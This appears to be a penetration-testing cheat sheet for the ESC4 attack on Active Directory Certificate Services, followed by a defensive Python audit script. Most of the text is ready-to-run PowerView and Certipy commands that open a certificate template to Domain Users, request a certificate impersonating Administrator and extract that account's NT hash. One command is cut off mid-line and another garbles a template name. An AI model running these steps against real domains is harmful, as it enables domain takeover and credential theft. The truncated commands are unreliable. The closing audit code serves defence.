
ESC4

You can create misconfigurations even in templates that are not initially vulnerable. For example, enabling the mspki-certificate-name-flag for a template allowing domain authentication could result in a situation similar to ESC1. This might allow less privileged users to define a fake Subject Alternative Name and authenticate as another user.

Windows

Import-Module PowerView

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> Import-Module .\PowerView.ps1

Add Certificate-Enrollment rights (to the Domain Users group)

PS /home/bobbuilder> Add-DomainObjectAcl -TargetIdentity Template4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose

Disabling Manager Approval Requirement

To disable the manager approval requirement, use the following PowerShell command:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-enrollment-flag'=9} -Verbose

Disabling Authorized Signature Requirement

To disable the authorized signature requirement, set the mspki-ra-signature attribute to 0:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab

Attacking ESC4 vulnerable template

PS /home/bobbuilder> .\certipy.exe template -u 'user1@minions.com' -p 'password1' -template <template_name> -save-old -dc-ip <ip>

ESC4 Template after modification

PS /home/bobbuilder> .\certipy.exe find -u 'user1@minions.com' -p 'password1' -vulnerable -stdout -dc-ip <ip>

Abusing the modified template

PS /home/bobbuilder> .\certipy.exe req -u 'user1@minions.com' -p 'password1' -ca lab-LAB-DC-CA -template <template_name> -upn Administrator

Retrieve Administrator NT Hash

PS /home/bobbuilder> .\certipy.exe auth -pfx administrator.pfx -username Administrator -domain minions.com

Restore template configuration

PS /home/bobbuilder> .\certipy.exe template -u 'user1@minions.com' -p 'password1' -template <template_name> -configuration <template_name>.json

Linux

Attacking ESC4 vulnerable template

bob$ certipy template -u 'user1@minions.com' -p 'password1' -template <template_name> -save-old -dc-ip <ip>

ESC4 Template after modification

bob$ certipy find -u 'user1@minions.com' -p 'password1' -vulnerable -stdout -dc-ip <ip>

Abusing the modified template

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca lab-LAB-DC-CA -template Template4<template_name> -upn Administrator

Retrieve Administrator NT Hash

bob$ certipy auth -pfx administrator.pfx -username Administrator -domain minions.com

Restore template configuration

bob$ certipy template -u 'user1@minions.com' -p 'password1' -template <template_name> -configuration <template_name>.json

  1. Create template
     bob$ certipy template -u 'user1@minions.com' -p 'password1' -template Template4 -save-old -dc-ip <ip>
  2. Restore
     bob$ certipy template -u 'user1@minions.com' -p 'password1' -template Template4 -configuration Template4.json -dc-ip <ip>
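From the defender's side, the same attributes the commands above rewrite (mspki-certificate-name-flag, mspki-enrollment-flag, mspki-ra-signature and the Certificate-Enrollment ACE) are what an audit should watch. The following is an added example, not code from the page or from the Certipy/PowerView projects: it decodes those attributes for a template read from AD and reports whether the template has been pushed into the ESC1-like state; the 'enroll_principals' key and the TEMPLATE4_BEFORE/TEMPLATE4_AFTER values are constructed assumptions.

```python
# Added audit check (not from the page): given a certificate template's
# attributes as read from AD, report whether the ESC4 edits described
# above have left it ESC1-like. Attribute names are the LDAP ones;
# 'enroll_principals' is an assumed, pre-resolved list of principals
# holding Certificate-Enrollment rights on the template.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in mspki-certificate-name-flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in mspki-enrollment-flag
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


def audit_template(tpl: dict) -> dict:
    """Return one boolean per ESC1 precondition for the given template."""
    name_flag = tpl.get("mspki-certificate-name-flag", 0)
    enroll_flag = tpl.get("mspki-enrollment-flag", 0)
    ekus = set(tpl.get("pkiextendedkeyusage", []))
    return {
        "enrollee_supplies_subject": bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "manager_approval_not_required": not enroll_flag & CT_FLAG_PEND_ALL_REQUESTS,
        "no_authorized_signatures": tpl.get("mspki-ra-signature", 0) == 0,
        # an empty EKU list means the certificate is valid for any purpose
        "client_auth_capable": not ekus or bool(ekus & CLIENT_AUTH_EKUS),
        "broad_enrollment_rights": bool(BROAD_PRINCIPALS & set(tpl.get("enroll_principals", []))),
    }


def is_esc1_like(tpl: dict) -> bool:
    """True only when every precondition holds at once."""
    return all(audit_template(tpl).values())


# Constructed sample values mirroring Template4 before and after the edits
# (enrollment-flag 9 clears PEND_ALL_REQUESTS; ra-signature goes to 0).
TEMPLATE4_BEFORE = {
    "mspki-certificate-name-flag": 0x0,
    "mspki-enrollment-flag": 0xB,  # PEND_ALL_REQUESTS (0x2) set
    "mspki-ra-signature": 1,
    "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
    "enroll_principals": ["Domain Admins"],
}
TEMPLATE4_AFTER = {
    **TEMPLATE4_BEFORE,
    "mspki-certificate-name-flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "mspki-enrollment-flag": 9,
    "mspki-ra-signature": 0,
    "enroll_principals": ["Domain Admins", "Domain Users"],
}
```

Run periodically against every template under CN=Certificate Templates and diff the result against the last run; a template flipping from False to True on is_esc1_like is the event worth alerting on.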